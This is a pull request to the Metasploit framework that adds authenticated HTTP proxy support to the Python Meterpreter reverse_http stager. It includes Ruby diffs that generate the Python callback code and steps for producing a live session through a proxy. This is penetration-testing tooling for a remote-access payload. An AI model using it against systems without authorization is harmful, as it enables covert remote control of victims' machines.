### PR TITLE
Add proxy authentication support to the Python Meterpreter

### DIFF
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -71,7 +71,7 @@ module Payload::Python::MeterpreterLoader
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.py')
 
     var_escape = lambda { |txt|
-      txt.gsub('\\', '\\'*8).gsub('\'', %q(\\\\\\\'))
+      txt.gsub('\\', '\\' * 8).gsub('\'', %q(\\\\\\\'))
     }
 
     unless ds['MeterpreterTryToFork']
@@ -102,6 +102,8 @@ module Payload::Python::MeterpreterLoader
     http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent']
     http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST']
     http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT']
+    http_proxy_user = opts[:http_proxy_user] || ds['HttpProxyUser']
+    http_proxy_pass = opts[:http_proxy_pass] || ds['HttpProxyPass']
     http_header_host = opts[:header_host] || ds['HttpHostHeader']
     http_header_cookie = opts[:header_cookie] || ds['HttpCookie']
     http_header_referer = opts[:header_referer] || ds['HttpReferer']
@@ -125,8 +127,14 @@ module Payload::Python::MeterpreterLoader
       met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
 
       if http_proxy_host.to_s != ''
-        proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
-        met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+        http_proxy_url = "http://"
+        unless http_proxy_user.to_s == '' && http_proxy_pass.to_s == ''
+          http_proxy_url << "#{Rex::Text.uri_encode(http_proxy_user)}:#{Rex::Text.uri_encode(http_proxy_pass)}@"
+        end
+        http_proxy_url << (Rex::Socket.is_ipv6?(http_proxy_host) ? "[#{http_proxy_host}]" : http_proxy_host)
+        http_proxy_url << ":#{http_proxy_port}"
+
+        met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(http_proxy_url)}'")
       end
     end
 

--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -27,6 +27,8 @@ module Payload::Python::ReverseHttp
       port:           ds['LPORT'],
       proxy_host:     ds['HttpProxyHost'],
       proxy_port:     ds['HttpProxyPort'],
+      proxy_user:     ds['HttpProxyUser'],
+      proxy_pass:     ds['HttpProxyPass'],
       user_agent:     ds['HttpUserAgent'],
       header_host:    ds['HttpHostHeader'],
       header_cookie:  ds['HttpCookie'],
@@ -74,15 +76,22 @@ module Payload::Python::ReverseHttp
     # required opts:
     #  proxy_host, proxy_port, scheme, user_agent
     var_escape = lambda { |txt|
-      txt.gsub('\\', '\\'*4).gsub('\'', %q(\\\'))
+      txt.gsub('\\', '\\' * 4).gsub('\'', %q(\\\'))
     }
 
     proxy_host = opts[:proxy_host]
     proxy_port = opts[:proxy_port]
+    proxy_user = opts[:proxy_user]
+    proxy_pass = opts[:proxy_pass]
 
     urllib_fromlist = ['\'build_opener\'']
-    urllib_fromlist << '\'ProxyHandler\'' if proxy_host.to_s != ''
     urllib_fromlist << '\'HTTPSHandler\'' if opts[:scheme] == 'https'
+    if proxy_host.to_s != ''
+      urllib_fromlist << '\'ProxyHandler\''
+      unless proxy_user.to_s == '' && proxy_pass.to_s == ''
+        urllib_fromlist << '\'ProxyBasicAuthHandler\''
+      end
+    end
     urllib_fromlist = '[' + urllib_fromlist.join(',') + ']'
 
     cmd  = "import zlib,base64,sys\n"
@@ -100,10 +109,17 @@ module Payload::Python::ReverseHttp
     end
 
     if proxy_host.to_s != ''
-      proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
-        "http://[#{proxy_host}]:#{proxy_port}" :
-        "http://#{proxy_host}:#{proxy_port}"
+      proxy_url = "http://"
+      unless proxy_user.to_s == '' && proxy_pass.to_s == ''
+        proxy_url << "#{Rex::Text.uri_encode(proxy_user)}:#{Rex::Text.uri_encode(proxy_pass)}@"
+      end
+      proxy_url << (Rex::Socket.is_ipv6?(proxy_host) ? "[#{proxy_host}]" : proxy_host)
+      proxy_url << ":#{proxy_port}"
+
       cmd << "hs.append(ul.ProxyHandler({'#{opts[:scheme]}':'#{var_escape.call(proxy_url)}'}))\n"
+      unless proxy_user.to_s == '' && proxy_pass.to_s == ''
+        cmd << "hs.append(ul.ProxyBasicAuthHandler())\n"
+      end
     end
 
     headers = []

--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -15,6 +15,7 @@ module Payload::Python::ReverseHttp
       Msf::Opt::http_header_options +
       Msf::Opt::http_proxy_options
     )
+    deregister_options('HttpProxyType')
   end
 
   #

--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -16,7 +16,7 @@ module MetasploitModule
   def initialize(info = {})
     super(update_info(info,
       'Name'          => 'Python Meterpreter',
-      'Description'   => 'Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6)',
+      'Description'   => 'Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+)',
       'Author'        => 'Spencer McIntyre',
       'Platform'      => 'python',
       'Arch'          => ARCH_PYTHON,


### PR DESCRIPTION
This adds support to the Python Meterpreter for using HTTP Proxies that require authentication by honoring the `HttpProxyUser` and `HttpProxyPass` options (at least one of the two must be set to a non-empty string). This also deregisters the `HttpProxyType` option because HTTP is the only one that is supported.

I also updated the meterpreter stage description to note that it's compatible with versions 2.5-2.7 and 3.1+ to imply that it does in fact work with Python 3.7, 3.8 etc.

This addresses rapid7/metasploit-payloads#386 and requires the changes in rapid7/metasploit-payloads#427.

## Verification

I used [proxy.py](https://github.com/abhinavsingh/proxy.py) as my proxy for testing and I highly recommend for the following reasons:
* Installation was a simple command, just had to run `pip install proxy.py`
* It runs in the foreground with logging by default making it easy to see that it's being used
* It supports authentication with the optional `--basic-auth` flag

- [ ] Install proxy.py using `pip install proxy.py`
- [ ] Run proxy.py on all interfaces with a username of "user" and a password of "pass" `proxy --hostname 0.0.0.0 --basic-auth user:pass`
- [ ] Start `msfconsole`
- [ ] `use payload/python/meterpreter/reverse_https`
- [ ] Set the `LHOST` and `LPORT` options per usual
- [ ] Set the `HttpProxyHost` and `HttpProxyPort` options to whatever system is running your proxy instance
- [ ] Set the `HttpProxyUser` and `HttpProxyPass` options to "user" and "pass" respectively
- [ ] Start the handler with `to_handler`
- [ ] Generate and run the stage
- [ ] Get a functioning session and see that the proxy is being used
